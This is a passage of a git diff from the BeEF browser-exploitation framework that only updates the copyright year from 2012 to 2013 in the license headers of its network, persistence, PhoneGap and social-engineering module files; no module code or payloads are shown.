+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/ping_sweep/command.js b/modules/network/ping_sweep/command.js
index 0e4fa7513..f796310e2 100644
--- a/modules/network/ping_sweep/command.js
+++ b/modules/network/ping_sweep/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/network/ping_sweep/config.yaml b/modules/network/ping_sweep/config.yaml
index 1fd9010d5..9a47db7d4 100644
--- a/modules/network/ping_sweep/config.yaml
+++ b/modules/network/ping_sweep/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb
index 28843fe48..3517326b6 100644
--- a/modules/network/ping_sweep/module.rb
+++ b/modules/network/ping_sweep/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/ping_sweep_java/command.js b/modules/network/ping_sweep_java/command.js
index 657ae87a6..2c2e07802 100644
--- a/modules/network/ping_sweep_java/command.js
+++ b/modules/network/ping_sweep_java/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/network/ping_sweep_java/config.yaml b/modules/network/ping_sweep_java/config.yaml
index 67c0ad693..fc6772d17 100644
--- a/modules/network/ping_sweep_java/config.yaml
+++ b/modules/network/ping_sweep_java/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/ping_sweep_java/module.rb b/modules/network/ping_sweep_java/module.rb
index cf836dd98..ec30195a4 100644
--- a/modules/network/ping_sweep_java/module.rb
+++ b/modules/network/ping_sweep_java/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/ping_sweep_java/pingSweep.java b/modules/network/ping_sweep_java/pingSweep.java
index ea0b31076..b67a4c8df 100644
--- a/modules/network/ping_sweep_java/pingSweep.java
+++ b/modules/network/ping_sweep_java/pingSweep.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/network/port_scanner/command.js b/modules/network/port_scanner/command.js
index dd633f7eb..643ab15d8 100644
--- a/modules/network/port_scanner/command.js
+++ b/modules/network/port_scanner/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/network/port_scanner/config.yaml b/modules/network/port_scanner/config.yaml
index ea54c96c1..190d528ef 100644
--- a/modules/network/port_scanner/config.yaml
+++ b/modules/network/port_scanner/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/network/port_scanner/module.rb b/modules/network/port_scanner/module.rb
index a76072c84..e9317b6e8 100644
--- a/modules/network/port_scanner/module.rb
+++ b/modules/network/port_scanner/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/persistence/confirm_close_tab/command.js b/modules/persistence/confirm_close_tab/command.js
index 9bdbb31f3..61c12ae79 100644
--- a/modules/persistence/confirm_close_tab/command.js
+++ b/modules/persistence/confirm_close_tab/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/persistence/confirm_close_tab/config.yaml b/modules/persistence/confirm_close_tab/config.yaml
index 40553840b..8ebef1f15 100644
--- a/modules/persistence/confirm_close_tab/config.yaml
+++ b/modules/persistence/confirm_close_tab/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/persistence/confirm_close_tab/module.rb b/modules/persistence/confirm_close_tab/module.rb
index a523c63aa..8ec20a65b 100644
--- a/modules/persistence/confirm_close_tab/module.rb
+++ b/modules/persistence/confirm_close_tab/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/persistence/iframe_above/command.js b/modules/persistence/iframe_above/command.js
index db8185d5f..a0179982c 100644
--- a/modules/persistence/iframe_above/command.js
+++ b/modules/persistence/iframe_above/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/persistence/iframe_above/config.yaml b/modules/persistence/iframe_above/config.yaml
index cb2a75350..9046ab30a 100644
--- a/modules/persistence/iframe_above/config.yaml
+++ b/modules/persistence/iframe_above/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/persistence/iframe_above/module.rb b/modules/persistence/iframe_above/module.rb
index 59bb60847..14554755f 100644
--- a/modules/persistence/iframe_above/module.rb
+++ b/modules/persistence/iframe_above/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/persistence/man_in_the_browser/command.js b/modules/persistence/man_in_the_browser/command.js
index 9e64a64e4..c016c79ef 100644
--- a/modules/persistence/man_in_the_browser/command.js
+++ b/modules/persistence/man_in_the_browser/command.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/persistence/man_in_the_browser/config.yaml b/modules/persistence/man_in_the_browser/config.yaml
index 732b3e31f..984d292b5 100644
--- a/modules/persistence/man_in_the_browser/config.yaml
+++ b/modules/persistence/man_in_the_browser/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/persistence/man_in_the_browser/module.rb b/modules/persistence/man_in_the_browser/module.rb
index 6035522ba..4632bc357 100644
--- a/modules/persistence/man_in_the_browser/module.rb
+++ b/modules/persistence/man_in_the_browser/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/persistence/popunder_window/command.js b/modules/persistence/popunder_window/command.js
index dc89768e9..cc3aabd4f 100644
--- a/modules/persistence/popunder_window/command.js
+++ b/modules/persistence/popunder_window/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/persistence/popunder_window/config.yaml b/modules/persistence/popunder_window/config.yaml
index baed13237..b3113f7a4 100644
--- a/modules/persistence/popunder_window/config.yaml
+++ b/modules/persistence/popunder_window/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/persistence/popunder_window/module.rb b/modules/persistence/popunder_window/module.rb
index c9612e35f..0d92f5023 100644
--- a/modules/persistence/popunder_window/module.rb
+++ b/modules/persistence/popunder_window/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_beep/command.js b/modules/phonegap/phonegap_beep/command.js
index 91802774f..b3a51c90a 100644
--- a/modules/phonegap/phonegap_beep/command.js
+++ b/modules/phonegap/phonegap_beep/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/phonegap/phonegap_beep/config.yaml b/modules/phonegap/phonegap_beep/config.yaml
index ef5ce3c3c..5dc6e1077 100644
--- a/modules/phonegap/phonegap_beep/config.yaml
+++ b/modules/phonegap/phonegap_beep/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_beep/module.rb b/modules/phonegap/phonegap_beep/module.rb
index 9f7743d7e..3993e9fb2 100644
--- a/modules/phonegap/phonegap_beep/module.rb
+++ b/modules/phonegap/phonegap_beep/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_check_connection/command.js b/modules/phonegap/phonegap_check_connection/command.js
index c5791aff7..d1bf87eb8 100644
--- a/modules/phonegap/phonegap_check_connection/command.js
+++ b/modules/phonegap/phonegap_check_connection/command.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/phonegap/phonegap_check_connection/config.yaml b/modules/phonegap/phonegap_check_connection/config.yaml
index a4734289e..d7f286e08 100644
--- a/modules/phonegap/phonegap_check_connection/config.yaml
+++ b/modules/phonegap/phonegap_check_connection/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_check_connection/module.rb b/modules/phonegap/phonegap_check_connection/module.rb
index 12f2ab5d0..03cb18f72 100644
--- a/modules/phonegap/phonegap_check_connection/module.rb
+++ b/modules/phonegap/phonegap_check_connection/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_detect/command.js b/modules/phonegap/phonegap_detect/command.js
index 63afc69fd..ab725a8a8 100644
--- a/modules/phonegap/phonegap_detect/command.js
+++ b/modules/phonegap/phonegap_detect/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/phonegap/phonegap_detect/config.yaml b/modules/phonegap/phonegap_detect/config.yaml
index c68722597..8fa326988 100644
--- a/modules/phonegap/phonegap_detect/config.yaml
+++ b/modules/phonegap/phonegap_detect/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_detect/module.rb b/modules/phonegap/phonegap_detect/module.rb
index dfb9c178e..b2d3709b5 100644
--- a/modules/phonegap/phonegap_detect/module.rb
+++ b/modules/phonegap/phonegap_detect/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_file_upload/command.js b/modules/phonegap/phonegap_file_upload/command.js
index fcf418b7b..bb8d239f0 100644
--- a/modules/phonegap/phonegap_file_upload/command.js
+++ b/modules/phonegap/phonegap_file_upload/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/phonegap/phonegap_file_upload/config.yaml b/modules/phonegap/phonegap_file_upload/config.yaml
index f873bedd4..6da1ecbf3 100644
--- a/modules/phonegap/phonegap_file_upload/config.yaml
+++ b/modules/phonegap/phonegap_file_upload/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_file_upload/module.rb b/modules/phonegap/phonegap_file_upload/module.rb
index 3f058b4b5..c508ea21c 100644
--- a/modules/phonegap/phonegap_file_upload/module.rb
+++ b/modules/phonegap/phonegap_file_upload/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_geo_locate/command.js b/modules/phonegap/phonegap_geo_locate/command.js
index 25d0d0095..c34389780 100644
--- a/modules/phonegap/phonegap_geo_locate/command.js
+++ b/modules/phonegap/phonegap_geo_locate/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/phonegap/phonegap_geo_locate/config.yaml b/modules/phonegap/phonegap_geo_locate/config.yaml
index af9f421a8..75007ab6d 100644
--- a/modules/phonegap/phonegap_geo_locate/config.yaml
+++ b/modules/phonegap/phonegap_geo_locate/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_geo_locate/module.rb b/modules/phonegap/phonegap_geo_locate/module.rb
index e66d6818e..80fcb8d77 100644
--- a/modules/phonegap/phonegap_geo_locate/module.rb
+++ b/modules/phonegap/phonegap_geo_locate/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_list_files/command.js b/modules/phonegap/phonegap_list_files/command.js
index f9063a5bc..9ba1ca42f 100644
--- a/modules/phonegap/phonegap_list_files/command.js
+++ b/modules/phonegap/phonegap_list_files/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/phonegap/phonegap_list_files/config.yaml b/modules/phonegap/phonegap_list_files/config.yaml
index 8e46172c1..fa4fc0b1a 100644
--- a/modules/phonegap/phonegap_list_files/config.yaml
+++ b/modules/phonegap/phonegap_list_files/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_list_files/module.rb b/modules/phonegap/phonegap_list_files/module.rb
index 4d2d068a9..4cba7f962 100644
--- a/modules/phonegap/phonegap_list_files/module.rb
+++ b/modules/phonegap/phonegap_list_files/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_persist_resume/command.js b/modules/phonegap/phonegap_persist_resume/command.js
index 65df0464d..232a7f279 100644
--- a/modules/phonegap/phonegap_persist_resume/command.js
+++ b/modules/phonegap/phonegap_persist_resume/command.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/phonegap/phonegap_persist_resume/config.yaml b/modules/phonegap/phonegap_persist_resume/config.yaml
index 0248549c6..6ee1f0f6e 100644
--- a/modules/phonegap/phonegap_persist_resume/config.yaml
+++ b/modules/phonegap/phonegap_persist_resume/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_persist_resume/module.rb b/modules/phonegap/phonegap_persist_resume/module.rb
index f324866f7..b9bb7d085 100644
--- a/modules/phonegap/phonegap_persist_resume/module.rb
+++ b/modules/phonegap/phonegap_persist_resume/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_persistence/command.js b/modules/phonegap/phonegap_persistence/command.js
index 60936c0fb..df520a17d 100644
--- a/modules/phonegap/phonegap_persistence/command.js
+++ b/modules/phonegap/phonegap_persistence/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/phonegap/phonegap_persistence/config.yaml b/modules/phonegap/phonegap_persistence/config.yaml
index f8f6a3201..b195d0366 100644
--- a/modules/phonegap/phonegap_persistence/config.yaml
+++ b/modules/phonegap/phonegap_persistence/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb
index 35c565aeb..210a634da 100644
--- a/modules/phonegap/phonegap_persistence/module.rb
+++ b/modules/phonegap/phonegap_persistence/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_start_record_audio/command.js b/modules/phonegap/phonegap_start_record_audio/command.js
index 35619852c..9df2a9a08 100644
--- a/modules/phonegap/phonegap_start_record_audio/command.js
+++ b/modules/phonegap/phonegap_start_record_audio/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/phonegap/phonegap_start_record_audio/config.yaml b/modules/phonegap/phonegap_start_record_audio/config.yaml
index 498874ada..8ceaa385c 100644
--- a/modules/phonegap/phonegap_start_record_audio/config.yaml
+++ b/modules/phonegap/phonegap_start_record_audio/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_start_record_audio/module.rb b/modules/phonegap/phonegap_start_record_audio/module.rb
index 7e8f6ebe3..ac955617c 100644
--- a/modules/phonegap/phonegap_start_record_audio/module.rb
+++ b/modules/phonegap/phonegap_start_record_audio/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_stop_record_audio/command.js b/modules/phonegap/phonegap_stop_record_audio/command.js
index 72dd96b18..589f76a73 100644
--- a/modules/phonegap/phonegap_stop_record_audio/command.js
+++ b/modules/phonegap/phonegap_stop_record_audio/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/phonegap/phonegap_stop_record_audio/config.yaml b/modules/phonegap/phonegap_stop_record_audio/config.yaml
index 2a78f4779..71ea3b389 100644
--- a/modules/phonegap/phonegap_stop_record_audio/config.yaml
+++ b/modules/phonegap/phonegap_stop_record_audio/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/phonegap/phonegap_stop_record_audio/module.rb b/modules/phonegap/phonegap_stop_record_audio/module.rb
index 974b18bdf..ec9d916ba 100644
--- a/modules/phonegap/phonegap_stop_record_audio/module.rb
+++ b/modules/phonegap/phonegap_stop_record_audio/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js
index 522102be3..8dfe3a35f 100644
--- a/modules/social_engineering/clickjacking/command.js
+++ b/modules/social_engineering/clickjacking/command.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/social_engineering/clickjacking/config.yaml b/modules/social_engineering/clickjacking/config.yaml
index c319b36c8..1b28a10ac 100644
--- a/modules/social_engineering/clickjacking/config.yaml
+++ b/modules/social_engineering/clickjacking/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/clickjacking/module.rb b/modules/social_engineering/clickjacking/module.rb
index 575e97d69..3524ddba3 100644
--- a/modules/social_engineering/clickjacking/module.rb
+++ b/modules/social_engineering/clickjacking/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/clippy/command.js b/modules/social_engineering/clippy/command.js
index bc08ef166..c39cacc0b 100755
--- a/modules/social_engineering/clippy/command.js
+++ b/modules/social_engineering/clippy/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/social_engineering/clippy/config.yaml b/modules/social_engineering/clippy/config.yaml
index 4f373c4c0..70d254c5e 100755
--- a/modules/social_engineering/clippy/config.yaml
+++ b/modules/social_engineering/clippy/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
